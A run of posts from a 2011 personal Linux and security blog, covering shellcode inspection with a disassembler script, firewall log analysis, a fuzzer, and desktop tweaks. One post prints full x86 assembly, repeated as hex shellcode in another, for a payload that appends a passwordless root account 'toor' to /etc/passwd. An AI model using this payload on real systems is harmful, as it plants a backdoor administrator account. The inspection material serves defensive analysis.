The script works flawlessly and with the least overhead that I could accomplish.</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-65126111253707332632011-03-04T10:40:00.000-08:002011-03-04T10:41:25.242-08:00exploitdb svn up again<div dir="ltr" style="text-align: left;" trbidi="on">For the past 2 weeks, a svn checkout of exploit db always resulted in:<br />
<br />
<b>svn: Network connection closed unexpectedly</b><br />
<br />
Today, finally its up again. Grab a local copy via:<br />
<br />
$] svn co svn://<a href="http://www.exploit-db.com/exploitdb" target="_blank">www.exploit-db.com/<wbr></wbr>exploitdb</a><br />
<br />
or to update a local copy, just do a 'svn update' in the checkout folder. </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-33818940308831288732011-02-24T08:16:00.000-08:002011-03-05T11:03:56.606-08:00dangers of publicly disclosed weaponized exploits<div dir="ltr" style="text-align: left;" trbidi="on">POC (Proof Of Concept) exploits are very easy to find. One doesn't have to look further than a Google search for countless lists. Similarly, weaponized versions are also available through the same channels. Skiddies never had it so good when to comes to downloading, compiling and owning the next door neighbour's box. But sometimes such perfect pieces of art have a terrible secret.<br />
<br />
Most skiddies never bother to even look at the code before compiling/running them. They just can't wait to see the familiar 'C:\..' or '#' prompts on their consoles. The payloads provided with any exploit can be a proper bind/reverse stager or it may even be a piece of malware!<br />
<br />
Lets be honest and think like a skiddie for once. I want to pwn a box, I fire up nmap and see that port xxx is open on the other end. I google for a 'port xxx exploit' and get some code from a disclosure website written in C. Instructions say to compile and run. A small look at the code may not reveal any problems, at least with the higher level C but does the shellcode checkout?? For that matter it may well be a double edged sword. It could very well download something on the skiddie's box, run it and provide his system and the victim's system to the 'real' cracker.<br />
<br />
There are ways by which one can analyze payloads by converting them back to assembly. By using a simple disassembler, the original assembly code can be rebuilt and understood.<br />
<br />
As a simple example, lets take the following shellcode:<br />
<b><br />
</b><br />
<b>\x31\xc0\x40\x89\xc3\xcd\x80</b><br />
<br />
Any shellcoder would easily recognize this as a simple exit() syscall shellcode used as a "hello world!" alternative in teaching shellcoding. All we need to do is to convert, write it as a binary file and disassemble it. The assembler we are going to use is ndisasm (<a href="http://www.nasm.us/doc/nasmdoca.html">Netwide Disassembler</a>).<br />
<br />
I have written a small python script for this very purpose:<br />
<br />
<blockquote><span style="font-size: x-small;">#!/usr/bin/python<br />
#s4ndman - shellcode to assembly conversion script for shellcode inspection.</span><br />
<span style="font-size: x-small;">#Requires: ndisasm<br />
<br />
import os<br />
import sys<br />
import binascii<br />
<br />
if len(sys.argv) < 2:<br />
print "[i]run syntax:"<br />
print "[i]"+sys.argv[0]+" hexcode"<br />
print "[i]example:"<br />
print "[i]"+sys.argv[0]+" \\x31\\xc0\\x40\\x89\\xc3\\xcd\\x80"<br />
sys.exit()<br />
<br />
try:<br />
f = open("binary", "wb")<br />
except:<br />
print "[-]file create error!"<br />
sys.exit()<br />
<br />
hstring = sys.argv[1].replace("\\x","")<br />
hstring = hstring.replace("x","")<br />
print "[+]normalized hexstring: "+hstring<br />
hexstring = binascii.a2b_hex(hstring)<br />
f.write(hexstring)<br />
f.close()<br />
<br />
print "[++++++++++++++++ASM DUMP++++++++++++++++]"<br />
os.system("ndisasm -b 32 binary")<br />
print "[++++++++++++++++ASM DUMP++++++++++++++++]"<br />
<br />
os.system("rm binary")<br />
<br />
sys.exit()</span></blockquote>Lets try it shall we:<br />
<blockquote><span style="font-size: x-small;">└─>>$] python2 shellcode_2_asm.py \x31\xc0\x40\x89\xc3\xcd\x80<br />
[+]normalized hexstring: 31c04089c3cd80<br />
[++++++++++++++++ASM DUMP++++++++++++++++]<br />
00000000 31C0 xor eax,eax<br />
00000002 40 inc eax<br />
00000003 89C3 mov ebx,eax<br />
00000005 CD80 int 0x80<br />
[++++++++++++++++ASM DUMP++++++++++++++++]</span></blockquote>And there we go, the 32bit exit() syscall assembly.<br />
<br />
Also we can take the alphanumeric version of the shellcode I <a href="http://mmaptonull.blogspot.com/2011/02/some-old-shellcode.html">posted</a> a while back and get the same output:<br />
<br />
<span style="font-size: x-small;">python2 shellcode_2_asm.py \xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23</span><br />
<span style="font-size: x-small;">[+]normalized hexstring: eb385e31c088460b88462bc6462a0a8d5e0c895e2c8d1e66b9420466baa401b005cd8089c331d28b4e2cb21fb004cd80b006cd80b00131dbcd80e8c3ffffff2f6574632f70617373776423746f6f723a3a303a303a743030723a2f726f6f743a2f62696e2f626173682023</span><br />
<span style="font-size: x-small;">[++++++++++++++++ASM DUMP++++++++++++++++]</span><br />
<span style="font-size: x-small;">00000000 EB38 jmp short 0x3a</span><br />
<span style="font-size: x-small;">00000002 5E pop esi</span><br />
<span style="font-size: x-small;">00000003 31C0 xor eax,eax</span><br />
<span style="font-size: x-small;">00000005 88460B mov [esi+0xb],al</span><br />
<span style="font-size: x-small;">00000008 88462B mov [esi+0x2b],al</span><br />
<span style="font-size: x-small;">0000000B C6462A0A mov byte [esi+0x2a],0xa</span><br />
<span style="font-size: x-small;">0000000F 8D5E0C lea ebx,[esi+0xc]</span><br />
<span style="font-size: x-small;">00000012 895E2C mov [esi+0x2c],ebx</span><br />
<span style="font-size: x-small;">00000015 8D1E lea ebx,[esi]</span><br />
<span style="font-size: x-small;">00000017 66B94204 mov cx,0x442</span><br />
<span style="font-size: x-small;">0000001B 66BAA401 mov dx,0x1a4</span><br />
<span style="font-size: x-small;">0000001F B005 mov al,0x5</span><br />
<span style="font-size: x-small;">00000021 CD80 int 0x80</span><br />
<span style="font-size: x-small;">00000023 89C3 mov ebx,eax</span><br />
<span style="font-size: x-small;">00000025 31D2 xor edx,edx</span><br />
<span style="font-size: x-small;">00000027 8B4E2C mov ecx,[esi+0x2c]</span><br />
<span style="font-size: x-small;">0000002A B21F mov dl,0x1f</span><br />
<span style="font-size: x-small;">0000002C B004 mov al,0x4</span><br />
<span style="font-size: x-small;">0000002E CD80 int 0x80</span><br />
<span style="font-size: x-small;">00000030 B006 mov al,0x6</span><br />
<span style="font-size: x-small;">00000032 CD80 int 0x80</span><br />
<span style="font-size: x-small;">00000034 B001 mov al,0x1</span><br />
<span style="font-size: x-small;">00000036 31DB xor ebx,ebx</span><br />
<span style="font-size: x-small;">00000038 CD80 int 0x80</span><br />
<span style="font-size: x-small;">0000003A E8C3FFFFFF call dword 0x2</span><br />
<span style="font-size: x-small;">0000003F 2F das <span style="font-size: x-small;">/*NOTE: This point onwards is the string</span></span><br />
<span style="font-size: x-small;">00000040 657463 gs jz 0xa6<span style="font-size: x-small;"> *</span></span><span style="font-size: x-small;">db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'.</span><br />
<span style="font-size: x-small;">00000043 2F das *The disassembler assumes the string as instructions</span><br />
<span style="font-size: x-small;">00000044 7061 jo 0xa7 *and creates the assembly for it.</span><br />
<span style="font-size: x-small;">00000046 7373 jnc 0xbb *So it is safe to ignore all the code below.</span><br />
<span style="font-size: x-small;">00000048 .........</span><br />
<span style="font-size: x-small;">[++++++++++++++++ASM DUMP++++++++++++++++]</span><br />
<br />
A few points to note here:<br />
1. The script assumes 32 bit shellcode, to vary it for 64 bit, change the line <span style="font-size: small;">"</span><span style="font-size: small;">ndisasm -b 32 binary" to "</span><span style="font-size: small;">ndisasm -b 64 binary"</span><br />
2. Downloading and running exploits should be done with utmost caution and if possible <b>use custom payloads</b>.<br />
<b>3.</b> <b>DONT BE A SKIDDIE!</b></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-63915555555780457672011-02-23T08:02:00.000-08:002011-03-04T11:14:48.509-08:00examining firewall log entries...<div dir="ltr" style="text-align: left;" trbidi="on">While going through the usual iptables log, its pretty interesting to see what all lurks out on the world wide web. There are some usual and unusual entries such as:<br />
<br />
<span style="font-size: x-small;"><b>localhost kernel: iptables DENIED:</b> IN=ppp0 OUT= MAC= <b>SRC=xxx.xxx.xx.x</b><b> DST=y</b><b>yy.yyy.yyy.yyy</b> LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=61742 DF PROTO=TCP <b>SPT=4993 <span style="font-size: small;">DPT=23</span></b> SEQ=2106909432 ACK=0 WINDOW=5808 RES=0x00 <b>SYN </b>URGP=0 OPT (020405AC0402080A012E13D60000000001030300)</span><br />
<br />
<span style="font-size: x-small;"><b>localhost kernel: iptables DENIED:</b> IN=ppp0 OUT= MAC= <b>SRC=xx.xxx.xxx.x DST=</b></span><span style="font-size: x-small;"><b>yyy.yyy.yyy.yyy</b></span><span style="font-size: x-small;"> LEN=40 TOS=0x00 PREC=0x00 TTL=95 ID=256 PROTO=TCP <b>SPT=6000 <span style="font-size: small;">DPT=1433</span> </b>SEQ=2031616000 ACK=0 WINDOW=16384 RES=0x00 <b>SYN </b>URGP=0</span><br />
<br />
<span style="font-size: x-small;"><b>localhost kernel: iptables DENIED:</b> IN=ppp0 OUT= MAC= <b>SRC=xxx.xxx.xx.xxx DST=</b></span><span style="font-size: x-small;"><b>yyy.yyy.yyy.yyy</b></span><span style="font-size: x-small;"> LEN=40 TOS=0x00 PREC=0x00 TTL=119 ID=256 DF PROTO=TCP <b>SPT=12200</b> <span style="font-size: small;"><b>DPT=1080</b></span> SEQ=474681 ACK=0 WINDOW=8192 RES=0x00 <b>SYN</b> URGP=0</span> <br />
<br />
Which upon analysis reveal some pretty interesting facts...<br />
<br />
1. Firstly I notice a lot of TCP Syn packets being denied at ports 1080, 3128, 8000, 8080 etc<br />
2. Also a lot of attempts at ports 1433, 1434<br />
3. And finally some random attempts at 22, 23, 25<br />
<br />
Whats interesting is that all the source IPs are random and in some situations, there is a flag on 2 ports per IP.<br />
<br />
<br />
These are what I think may be the causes:<br />
<br />
1. A simple lookup would reveal the purpose of these ports as the following:<br />
<b>1080 : socks</b><br />
<b>3128 : squid-http</b><br />
<b>8000 : http-alt</b><br />
<b>8080 : http-proxy</b><br />
With this, one can easily deduce that many systems over the web are intentionally/unintentionally checking for open proxies on random IP addresses. These may be normal boxes with scripts/programs running that generate random IPs or using old server connection logs. They may also be infected systems with malware performing the same task. This is one of the many ways lists of open proxies surface on underground websites.<br />
<br />
2. These are the ports on which <b>Microsoft SQL</b> server typically listens on and may well be sought after by full blown malware looking for newer prey or automated scans running on a cracker's box.<br />
<br />
3. These are usually ports for the typical <b>ssh</b>, <b>telnet</b> and <b>smtp</b> services and are most probably being scanned for vulnerabilities or vulnerable configurations by malware on rooted boxes or automated/active scans running on a cracker's box.<br />
<br />
Its quite funny to see the intensity of these reports on the logs. Quite a few popup every hour or so. It is a reminder that a by just connecting a system to the internet without properly securing it can be pretty fatal. Its a dangerous WWW out there and web safety requires proper measures to be taken before connecting the <b>wire</b>. </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-50724951395920052462011-02-12T22:07:00.000-08:002011-02-24T08:17:27.726-08:00python proxy tester<div dir="ltr" style="text-align: left;" trbidi="on">Getting hold of proxy lists is a not a problem these days. A lot of websites provide pages upon pages of proxies but the issue arises when more than 60-70% of them don't work. Sitting and testing each one can be a pain so to ease the issue, I fired up medit and wrote the following script.<br />
<br />
The script takes input as a file with the structure:<br />
<ip>[ip]:[port]<port></port></ip><br />
<br />
code: <a href="http://pastebin.com/w5iardS4">http://pastebin.com/w5iardS4</a> </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-20788701347320678272011-02-12T19:03:00.000-08:002011-03-04T11:15:45.396-08:00lm_sensors and Tjunction-max<div dir="ltr" style="text-align: left;" trbidi="on">Recently, the temperature values being reported by lm_sensors on my linux-lap were becoming a point of concern. The fan and heatsink assembly had just been cleaned a few days earlier but still lm_sensors reported my CPU was at ~70C while idling! Even considering the fact that I live in a hot part of the world, the values were too high for this time of the year and for an idling CPU. Checking the logs and a bit of web research revealed the culprit:<br />
<br />
<span style="font-size: x-small;"> └─>>$] dmesg | grep Tj<br />
coretemp coretemp.0: TjMax is assumed as 100 C!<br />
coretemp coretemp.1: TjMax is assumed as 100 C!</span><br />
<br />
The <a href="http://ark.intel.com/Product.aspx?id=33915">Intel datasheet</a> for a T5750 processor reports the designed Tj-max as 85C but gets detected as 100C, so lm_sensors was reporting the values with a +15C offset.<br />
<br />
The bug seems to be in a recent git commit as explained in this thread: <a href="https://bbs.archlinux.org/viewtopic.php?pid=829902#p829902">https://bbs.archlinux.org/viewtopic.php?pid=829902#p829902</a><br />
Tjunction explained: <a href="http://www.techreaction.net/2009/10/14/guide-to-understanding-intel-temperatures/">http://www.techreaction.net/2009/10/14/guide-to-understanding-intel-temperatures/</a><br />
<br />
UPDATE:<br />
FIX: After discussing the issue with the devs on IRC, a small fix was suggested. Worked for me.<br />
<br />
edit '/etc/sensors3.conf' and add the lines<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">chip "coretemp-*"<br />
compute temp1 @-15,@+15<br />
compute temp2 @-15,@+15</span></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-31865089992031965522011-02-10T15:56:00.000-08:002011-02-24T07:14:04.636-08:00some old shellcode...<div dir="ltr" style="text-align: left;" trbidi="on">Going through some old files, I came across some old shellcode I had written. Nothing special but a small payload to append the /etc/passwd file. To be honest its not even that great because to use it, you need an exploit that provides uid=0 such as a kernel null pointer dereference. Anyway, here is the code:<br />
<br />
<span style="font-size: x-small;">;append_passwd.asm</span><br />
<span style="font-size: x-small;">;Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding password-less root account with login name "toor"</span><br />
<span style="font-size: x-small;">;Platform: linux/x86</span><br />
<span style="font-size: x-small;">;Size: 107 bytes</span><br />
<span style="font-size: x-small;">;Author: $andman</span><br />
<span style="font-size: x-small;">;BEGIN CODE</span><br />
<blockquote><span style="font-size: x-small;"><i>Section .data<br />
global _start<br />
_start:<br />
jmp short callfunc<br />
func:<br />
pop esi<br />
xor eax, eax<br />
mov byte [esi+11], al<br />
mov byte [esi+43], al<br />
mov byte [esi+42], 0xa<br />
lea ebx, [esi+12]<br />
mov long [esi+44],ebx<br />
lea ebx,[esi]<br />
mov cx,1090<br />
mov dx,0x1a4<br />
mov al,0x05<br />
int 0x80<br />
mov long ebx, eax<br />
xor edx,edx<br />
mov ecx, [esi+44]<br />
mov dl,31<br />
mov al,0x04<br />
int 0x80<br />
mov al,0x06<br />
int 0x80<br />
mov al,0x01<br />
xor ebx,ebx<br />
int 0x80<br />
callfunc:<br />
call func<br />
db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'</i></span></blockquote><span style="font-size: x-small;">;CODE END</span><br />
<br />
The compiled, alphanumeric code can be taken from exploitdb:<br />
<a href="http://www.exploit-db.com/exploits/13579/">http://www.exploit-db.com/exploits/13579/ </a></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-37495161517774340402011-02-09T22:49:00.000-08:002011-02-24T08:45:27.582-08:00sfuzz, a mutation file format fuzzer<div dir="ltr" style="text-align: left;" trbidi="on">I thought I might as well publish some code, well here is a little something I have been working on. A simple mutation fuzzer. It just does<b> _dumb_ </b>fuzzing for now but I intend to improve it for structural correctness while fuzzing and smarter fault injections. Not yet completed but It has already shown results, caused many apps to crash with mostly being Invalid reads and 1 Invalid write [dunno if exploitable? will check that out]. Anyway here is the code for the fuzzer. Also, I am thinking towards writing a smart generation fuzzer for structured non binaries. Anyway here is the code...<br />
<br />
Source[Linux]:<br />
<a href="http://pastebin.com/kVNyKsip">http://pastebin.com/kVNyKsip</a><br />
<br />
EDIT: A small bug... the randomization depends on the current time. This means to achieve a bit decent randomization, a sleep value of 1s is at least needed. </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-58641544223923856072011-02-09T11:34:00.001-08:002011-03-04T11:15:56.491-08:00Multiple $PS1s with urxvt and xprop<div dir="ltr" style="text-align: left;" trbidi="on">Recently, I decided to embed terminals in my desktop and preferred that the prompt for them should be different than for a normal terminal window. It took a while but I finally achieved it. Embedding the terminals was easy as explained here:<br />
<br />
<a href="https://wiki.archlinux.org/index.php/Openbox#Urxvt_in_the_background"><span style="font-weight: bold;">https://wiki.archlinux.org/index.php/Openbox#Urxvt_in_the_background</span></a><br />
<br />
and as for the different $PS1 prompts, I just modified my <span style="font-weight: bold;">.bashrc</span> with the following condition:<br />
<br />
#BEGIN CODE#<br />
<br />
<span style="font-style: italic;">winId=$(xprop -id $WINDOWID | grep "URxvtbg")</span><br />
<br />
<span style="font-style: italic;">if [ "$winId" == "" ]</span><br />
<span style="font-style: italic;">then</span><br />
<span style="font-style: italic;"> PS1="┌─\[\e[1;36m\][\u@\h]\[\e[m\].:\[\e[0;36m\][$(date +"%d/%m/%y-(%T)")]\[\e[m\]:.\[\e[1;36m\][\w]\[\e[m\]\n└─>>\[\e[1;32m\]$\[\e[m\]] "</span><br />
<span style="font-style: italic;">else</span><br />
<span style="font-style: italic;"> PS1='[\u@\h \W]\$ '</span><br />
<span style="font-style: italic;">fi</span><br />
<span style="font-size: 85%;"><span style="font-style: italic;"></span></span><br />
<blockquote><span style="font-size: 100%;"><span style="font-style: italic;"></span></span></blockquote>#END CODE#<br />
<br />
Basically, what this does is that it gets the window information from <span style="font-weight: bold;">xprop</span> using the $WINDOWID bash variable and looks for the specific <span style="font-style: italic;">name</span>* that was assigned to this terminal. If found, applies a specific $PS1 value and if not, applies the other.<br />
<br />
<span style="font-style: italic;">*Refer urxvt's man page for the switch '-name'</span>.</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-8203764950512695422011-02-06T16:19:00.000-08:002011-03-04T11:16:41.652-08:00Fortune for you!!<div dir="ltr" style="text-align: left;" trbidi="on">Almost all linux users are familiar with the fortune program. For new users, here is a small snippet:<br />
<br />
Name:<br />
<span style="font-style: italic;">fortune - print a random, hopefully interesting, adage</span><br />
<br />
Description from the man page:<br />
<span style="font-style: italic;">When </span><b style="font-style: italic;">fortune</b><span style="font-style: italic;"> is run with no arguments it prints out a random epigram. Epigrams are divided into several categories.</span><br />
<br />
Well, in order to fully utilize the program, I went ahead and wrote a small script that automatically displayed a random fortune everytime I logged in. Here is the script and all it requires is the notification daemon to be installed for your particular wm.<br />
<br />
<span style="font-style: italic;">#!/bin/bash</span><br />
<span style="font-style: italic;">sleep 3</span><br />
<span style="font-style: italic;">notify-send "Hello $(whoami), Your Daily Fortune..." "$(fortune)"</span><br />
<br />
Save it as fortune.sh and mark it as executable by:<br />
<br />
<span style="font-style: italic;">chmod +x fortune.sh<br />
<br />
<span style="font-style: italic;"></span></span>and just add it to the post login scripts in your particular wm, openbox in my case<span style="font-style: italic;"> <span style="font-style: italic;"></span></span>so '<span style="font-style: italic;">~/.config/openbox/autostart.sh</span>'<span style="font-style: italic;"><span style="font-style: italic;"></span></span></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0